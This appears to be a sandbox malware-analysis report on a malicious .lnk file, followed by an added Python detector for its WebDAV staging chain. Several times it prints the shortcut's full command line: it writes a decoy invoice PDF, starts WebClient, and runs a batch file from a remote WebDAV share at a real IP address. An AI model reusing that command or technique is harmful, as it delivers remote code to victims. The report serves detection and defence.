Analysis
max time kernel: 120s
max time network: 124s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 09/05/2024, 08:32
Static task: static1
Behavioral task: behavioral1
  Sample: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
  Resource: win10v2004-20240508-en
General
Target: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Size: 2KB
MD5: 7b5db2de0a2d91a0e6f83080e8dd0d6e
SHA1: 5a370fa094efe972929d1e6dc604162821da698b
SHA256: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
SHA512: 2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c
Malware Config
Signatures
Launches sc.exe (1 IoC)
Sc.exe is a Windows utility to control services on the system.
  pid 1980  sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Runs ping.exe (1 TTP, 1 IoC)
  pid 2572  PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 2672  AcroRd32.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 2672  AcroRd32.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid 2672  AcroRd32.exe
  pid 2672  AcroRd32.exe
Suspicious use of WriteProcessMemory (16 IoCs)
  description                        pid   process   procid_target
  PID 2380 wrote to memory of 2612   2380  cmd.exe   29
  PID 2380 wrote to memory of 2612   2380  cmd.exe   29
  PID 2380 wrote to memory of 2612   2380  cmd.exe   29
  PID 2612 wrote to memory of 2672   2612  cmd.exe   30
  PID 2612 wrote to memory of 2672   2612  cmd.exe   30
  PID 2612 wrote to memory of 2672   2612  cmd.exe   30
  PID 2612 wrote to memory of 2672   2612  cmd.exe   30
  PID 2612 wrote to memory of 1980   2612  cmd.exe   31
  PID 2612 wrote to memory of 1980   2612  cmd.exe   31
  PID 2612 wrote to memory of 1980   2612  cmd.exe   31
  PID 2612 wrote to memory of 2572   2612  cmd.exe   32
  PID 2612 wrote to memory of 2572   2612  cmd.exe   32
  PID 2612 wrote to memory of 2572   2612  cmd.exe   32
  PID 2612 wrote to memory of 2348   2612  cmd.exe   34
  PID 2612 wrote to memory of 2348   2612  cmd.exe   34
  PID 2612 wrote to memory of 2348   2612  cmd.exe   34
Processes
(depth 1) C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
  Suspicious use of WriteProcessMemory
  PID: 2380
  (depth 2) C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"
    Suspicious use of WriteProcessMemory
    PID: 2612
    (depth 3) C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID: 2672
    (depth 3) C:\Windows\system32\sc.exe
      sc start webclient
      Launches sc.exe
      PID: 1980
    (depth 3) C:\Windows\system32\PING.EXE
      ping localhost -n 7
      Runs ping.exe
      PID: 2572
    (depth 3) C:\Windows\system32\cmd.exe
      cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat
      PID: 2348

What the chain does: the shortcut's argument string (pid 2612) first writes a one-line decoy into NotaFiscal.pdf (the text is Portuguese for "preview unavailable") and opens it in Adobe Reader so the victim sees a broken invoice rather than nothing; it then starts the WebClient service, which is what lets the \\38.180.136.158@80\ UNC path be resolved as WebDAV over HTTP port 80 instead of SMB; ping localhost -n 7 is a roughly six-second sleep that gives the service time to come up; finally a minimized cmd.exe (pid 2348) runs Offer202447.bat straight from the remote share, so the second stage never has to be dropped to disk by the shortcut itself. On a host where WebClient is disabled or outbound 80 to that address is blocked, the chain stops at the last step.
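The following detector is an example added to this report, not Triage output. It takes the process events from the tree above (the command lines are copied from the report and the pid/ppid pairs follow the WriteProcessMemory IoCs; the event-dict layout, rule names and function names are this example's own) and flags the staging chain: a .lnk handed to cmd.exe, an echo'd decoy document, WebClient being started, ping used as a sleep, and a script executed from a \\host@port\ WebDAV share. It also extracts the full UNC target as a blockable IoC.

```python
"""Detection logic for the LNK -> cmd.exe -> WebClient -> WebDAV .bat chain seen in
the process tree above. Example code added to this report, not Triage output."""
import re
from collections import defaultdict

# Constructed input: command lines copied from the Triage process tree above,
# pid/ppid pairs taken from the WriteProcessMemory IoCs in the report.
SAMPLE_EVENTS = [
    {"pid": 2380, "ppid": None,
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk"},
    {"pid": 2612, "ppid": 2380,
     "cmdline": r'"C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"'},
    {"pid": 2672, "ppid": 2612,
     "cmdline": r'"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"'},
    {"pid": 1980, "ppid": 2612, "cmdline": "sc start webclient"},
    {"pid": 2572, "ppid": 2612, "cmdline": "ping localhost -n 7"},
    {"pid": 2348, "ppid": 2612,
     "cmdline": r"cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"},
]

# Rule names are this example's own, not Triage signature names.
RULES = {
    # cmd.exe given a .lnk as its argument (how a shortcut payload gets launched)
    "lnk_launch": re.compile(r"\bcmd(?:\.exe)?\b.*\.lnk\b", re.I),
    # echo'd text redirected into a document: a throwaway decoy for the victim
    "decoy_document": re.compile(r"\becho\b[^&|>]*>\s*\S+\.(?:pdf|docx?|xlsx?)\b", re.I),
    # starting or auto-enabling WebClient turns on the WebDAV mini-redirector
    "webclient_start": re.compile(r"\bsc(?:\.exe)?\s+(?:start|config)\s+webclient\b", re.I),
    # ping -n N is the classic cmd.exe sleep substitute
    "ping_sleep": re.compile(r"\bping\b.*?\s-n\s+\d+", re.I),
}
# \\host@80\ or \\host@SSL\ is WebDAV-only UNC syntax; it never goes over SMB.
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(?:ssl|\d{1,5})\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:bat|cmd|vbs|js|ps1|hta)\b", re.I)
# The rules that together make up the staging chain worth alerting on.
CHAIN = {"webclient_start", "webdav_unc", "remote_script_exec"}


def classify(cmdline: str) -> set[str]:
    """Return the names of every rule a single command line triggers."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    m = WEBDAV_UNC.search(cmdline)
    if m:
        hits.add("webdav_unc")
        # only the part after the share prefix counts: a script run *from* the share
        if SCRIPT_EXT.search(cmdline[m.end():]):
            hits.add("remote_script_exec")
    return hits


def analyze(events: list[dict]) -> dict[int, dict]:
    """Union the rule hits of every process under its root ancestor and decide,
    per root, whether the complete WebDAV staging chain is present."""
    parent = {e["pid"]: e["ppid"] for e in events}

    def root(pid: int) -> int:
        while parent.get(pid) is not None:
            pid = parent[pid]
        return pid

    per_root: dict[int, set[str]] = defaultdict(set)
    for e in events:
        per_root[root(e["pid"])] |= classify(e["cmdline"])
    return {r: {"rules": hits, "webdav_lnk_chain": CHAIN <= hits}
            for r, hits in per_root.items()}


def extract_webdav_targets(events: list[dict]) -> list[str]:
    r"""Pull the full \\host@port\share\path strings out as blockable IoCs."""
    rx = re.compile(r"\\\\[\w.\-]+@(?:ssl|\d{1,5})\\\S+", re.I)
    found = {m.group(0).rstrip("\"'") for e in events for m in rx.finditer(e["cmdline"])}
    return sorted(found)


if __name__ == "__main__":
    for root_pid, verdict in analyze(SAMPLE_EVENTS).items():
        flag = "WEBDAV LNK CHAIN" if verdict["webdav_lnk_chain"] else ""
        print(root_pid, sorted(verdict["rules"]), flag)
    print(extract_webdav_targets(SAMPLE_EVENTS))
```

The verdict is computed per process tree rather than per command line on purpose: here the whole chain is visible in one cmd.exe argument string, but the same technique split across separate children (as the sc.exe, PING.EXE and second cmd.exe above are) still collapses to one hit under root pid 2380. A plain \\server\share path without the @port suffix is deliberately not flagged, since that is ordinary SMB.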
Network
MITRE ATT&CK Enterprise v15
Downloads
File 1
  Filesize: 3KB
  MD5: f7990247e022bf5b7d09e633ff0f6e6d
  SHA1: d2511e80ca516481bda9a0bf13bd45b441c3e780
  SHA256: fd352a2335b720596c93bdf0a5fbe8f285e3bf46d5c8f227ccbfab80e6afa701
  SHA512: baa35aa38e742cbc3e74b9f8cd95c1f22a698590d5d598d6030c2dd1ebbad3e9cb2bc3082cfeb19ca632eee03818fcbbdd68531119c9ae1a9a6a4c3406ee21e9
File 2
  Filesize: 29B
  MD5: 823a9caa296579d6a40cd5195d969727
  SHA1: 5592813787ecff9133229439498d624339c07ece
  SHA256: 60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
  SHA512: 77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc